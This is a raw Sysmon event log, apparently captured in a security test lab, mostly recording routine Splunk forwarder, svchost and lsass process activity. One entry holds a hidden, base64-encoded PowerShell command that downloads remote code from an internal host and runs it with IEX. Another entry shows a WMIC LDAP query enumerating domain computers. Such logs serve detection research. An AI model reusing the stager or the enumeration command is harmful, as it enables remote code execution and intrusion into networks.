5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9d93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f8e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff3f93(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5cf89b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fb14e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff335e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c503aabb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b1bafa4e567963a567180237d9e816e6\Microsoft.PowerShell.Commands.Utility.ni.dll+ffff66c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbf41e(wow64) 154100x800000000000000035085651Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.949{B81B27B7-4F8A-613A-6D90-03000000C801}5444C:\Windows\System32\wbem\WMIC.exe10.0.14393.0 (rs1_release.160715-1616)WMI Commandline UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwmic.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountnameC:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQATQBTAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQAwAC4AMAAuADEALgAxADYALwBiAGgALwBzAHkAbgBjAC8AYQBvAGwALwBfAHIAcAAnACkAKQApADsASQBFAFgAIAAkAE0AUwA= 23542300x800000000000000035085650Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.758{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=399B8CAD4C45B3CBEF0D350100B27856,SHA256=D6ECBB9F0AB5E89870A612180FE3618DC96157C438777AC2CBCCE74D2582A2D7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085649Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.758{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=60603BA9880E9712AF6C6570CC019085,SHA256=CD5E56B0A0AE3FE5558502C96AA5EB00534EBAFB2F3DE885CDA73D85EBFFD77B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085648Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.758{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=97D98F8DA5FC6E538047BB0A8521DD85,SHA256=321BB2F80C9ECF83F38ABF026DFCA55B5A0CCBAFCEB54DB8BF46511841790911,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085647Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.758{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=6DBCA2DEB6A20F0C96A7EA2E16036E5D,SHA256=78BB266E9EBF3CDA9C43CA5E8A4D0AB670E84099DD5724581F652259800DCFB5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085646Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.758{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=F67C06F9034BEFDAFB41A043E3B84BA8,SHA256=A5E8E6294E4A5A7D187F36101F8CB7EF40339BD87DF2318FDFDC9DA407F50104,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085645Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.758{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=CAD745E102C446221419F0401F224D75,SHA256=657D8250CFB47F6864A38959E2DA431280E90E0618D2DA7F3BDDD802DB77DC61,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085644Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.243{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09009648DEECFD9FE6A642C37D24A364,SHA256=E25779132726FEEDD780CCDFE1F9F854AB1410E3937358129296B3EFA0EA9FAE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085685Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:43.957{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=17F996CD8A5C2E5911B4DC962CEDCE58,SHA256=03A94A3D1DF895E61A0FE75DD08FB777F09109437D481228379C804872B73AAE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085684Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:43.957{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C2ABB86CA1A86A19ADC1737C91087030,SHA256=6FE5B2C998DB091F8F490836B3408EA84083D47EC509FF6921226CBA8DD7440E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085683Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:43.777{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085682Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:43.777{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085681Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:43.777{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085680Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:43.757{B81B27B7-4F8B-613A-6E90-03000000C801}37684660C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035085679Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:43.657{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40140AC050BC2C615677337DAEFC801F,SHA256=AA4D64EE9C3E917918709E1ADEF48B35BD5157DA8F502FA5C6E54177515747C0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085678Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:43.579{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4F8B-613A-6E90-03000000C801}3768C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085677Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:43.579{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085676Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:43.579{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085675Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:43.579{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085674Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:43.579{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085673Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:43.579{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4F8B-613A-6E90-03000000C801}3768C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085672Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:43.579{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4F8B-613A-6E90-03000000C801}3768C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085671Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:43.574{B81B27B7-4F8B-613A-6E90-03000000C801}3768C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035085670Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:07.253{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56754-false10.0.1.12-8000- 734700x800000000000000035085669Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.995{B81B27B7-4F1A-613A-5B90-03000000C801}6804C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x800000000000000035085704Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:44.926{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4F8C-613A-7090-03000000C801}1264C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085703Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:44.926{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085702Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:44.926{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085701Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:44.926{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085700Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:44.926{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 